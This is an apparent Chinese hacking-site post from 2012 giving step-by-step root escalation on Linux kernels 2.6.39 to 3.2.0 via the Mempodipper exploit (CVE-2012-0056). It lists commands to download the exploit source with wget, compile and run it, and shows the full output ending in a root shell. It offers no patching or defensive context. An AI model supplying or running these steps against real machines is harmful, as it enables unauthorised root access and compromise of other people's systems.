黑客365

首页 » 破解版 » 阅读文章

Linux 内核2.6.39 -3.2.0 提权漏洞

2012-01-29 15:43 3406 0 发表评论

Linux 2.6.39 到 3.2.0 内核中,普通用户可以通过运行特定代码获得 root 权限。

uname -a 察看你的内核版本

 普通用户提升为root权限步骤:

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

cc mempodipper.c

./a.out

在执行完毕后运行 whoami 来看是否执行成功。

运行成功后显示如下信息

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/20553/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# whoami
root


收藏此文



评论 共0条 (RSS 2.0) 发表评论

  1. 暂无评论,快抢沙发吧。

发表评论

  • 使用新浪微博登陆
  • 
    疑问 冷笑 悲伤 坏蛋 感叹 微笑 脸红 大笑 吃惊 惊讶 困惑 酷 大声笑 恼火 古怪 转眼睛 给眼色 好主意 箭头 一般 哭了 绿人
  • want to say:

回到页首